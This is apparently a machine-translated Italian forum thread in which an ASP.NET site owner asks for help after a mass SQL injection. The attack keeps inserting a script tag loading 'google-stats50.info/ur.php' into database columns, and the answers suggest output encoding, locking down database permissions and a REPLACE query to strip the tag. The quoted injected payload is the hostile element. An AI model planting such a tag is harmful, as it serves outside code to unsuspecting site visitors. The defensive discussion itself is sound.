2010-09-23 5 views
5

Sono in grossi guai. Per favore aiuto!!!!!!!!!!XSS Attack sul sito Web ASP.NET

Mio sito è stato attaccato da alcuni maligni sceneggiatura </title> < script src = http: // google-stats50.info/ur.php>. Questo script viene aggiunto automaticamente a qualsiasi colonna di alcune tabelle. Ho rimosso questo script. Ma dopo poche ore, è riapparso in alcuni tavoli. Ma questa volta è </title> < script src = http: // google-stats49.info/ur.php>.

Il mio cliente si lamenta della sceneggiatura. La tecnologia utilizzata è ASP.NET 1.1, SQL Server 2005.

prega di aiuto.

Grazie in anticipo !!!!!!

risposta

2

Spegnere il sito. Il tuo server può o non può essere fregato ora.

dovete scoprire dove i cambiamenti sono provenienti da - database o file di sistema

Se è la DB allora si potrebbe essere ok, qualcuno probabilmente sta usando SQL injection. Imposta le autorizzazioni in modo che il DB non possa essere aggiornato dal sito per ora fino a quando non trovi il punto di INIEZIONE SQL.

Se è il vostro file system allora probabilmente necessario cancellare e reimpostare il sito. Sono dentro e non te ne libererai. Trova il tuo punto di ingresso, ma sarà difficile.

+1

Inoltre, cercare di sterilizzare (non permettendo html/js) gli input degli utenti. – sheeks06

+0

carichiamo il contenuto sul sito Web di terzi tramite la tecnologia di scripting ... questo è lo scopo del mio sito Web .... c'è un modo per risolverlo al più presto – user423719

+0

Probabilmente ora è troppo tardi, ma se succedono cose del genere ed è di solito è necessario assumere un esperto. Un esperto molto costoso. – Dann

4

Quando si esegue il rendering del testo dal database è possibile utilizzare due modi per evitare questo script.

  1. Utente Server.HtmlEncode(DataFromDatabase);
  2. Utilizzare il Microsoft Anti-Cross dll library che hanno una funzione simile con più opzioni.

Last MS Anti-XSS library now è 3.1.
How to using video

Come passano questo script.

  1. Sul contatto o altri moduli.
  2. Sul riferimento del browser sulle statistiche e quando navigano nel tuo sito, tieni un registro su questo e quando vai a vedere questo log lo script è in esecuzione.

Spero che questo aiuto.

+0

Ok..grazie ..... implementerò queste prevenzioni nella mia applicazione. Ma esiste una soluzione rapida per rimuovere lo script? – user423719

+0

Non so come stanno passando questo script e lo si iniettano nel database. – user423719

+0

@ user423719 Ho digitato sulla mia risposta 2 possibili modi in cui questo viene iniettato, dai moduli di contatto o dai dati del browser che si registrano. Non rimuovere lo script, fallo in modo che non venga eseguito, quindi individua come viene inserito e, se lo desideri, puoi prendere ulteriori misure. – Aristos

0

mi sento di raccomandare di rimuovere tutti hostheader extern vincolante nel IIS. Che consente di individuare il problema a livello locale, senza alcuna tuo cliente potrebbe essere infetto/essere rubato da

0

Un rimedio rapido

seguito non è una soluzione, ma con questo si può rimuovere lo script dal database in un singola query. Questo è quello che faccio per ora :).


UPDATE nome_tabella SET nome_colonna = REPLACE (CAST (column_name AS nvarchar (MAX)), 'http://google-stats49.info/ur.php> ',' ')


Questo funziona come trovare e sostituire la roba in parola. Se trovi qualcosa in merito allo script del virus, inseriscilo qui.

saluti, Masood

+0

Ciao ragazzi, ho un altro collegamento di iniezione. Sembra che questo sia stato iniettato dallo stesso bot. Non posso pubblicare il link qui.book

+0

appare di nuovo e di nuovo. Ho crittografato le informazioni sensibili nel file Web.config. Penso che abbia fermato la sceneggiatura per riapparire per circa 24 ore. Ma è tornato di nuovo. Per favore aiuto. – user423719

0

stesso problema qui ... è iniziato circa 15.30 e infettare 4 tavoli ... ecco la soluzione per la ricerca full database: http://justgeeks.blogspot.com/2006/10/search-ms-sql-server-for-any-text.html solo modificarlo per tornare nomi delle tabelle distinte.

e questo funzionerà come Masood menzione

UPDATE Table_Name SET Column_Name = REPLACE(CAST(Column_Name AS nvarchar(MAX)), 'stupid script', '')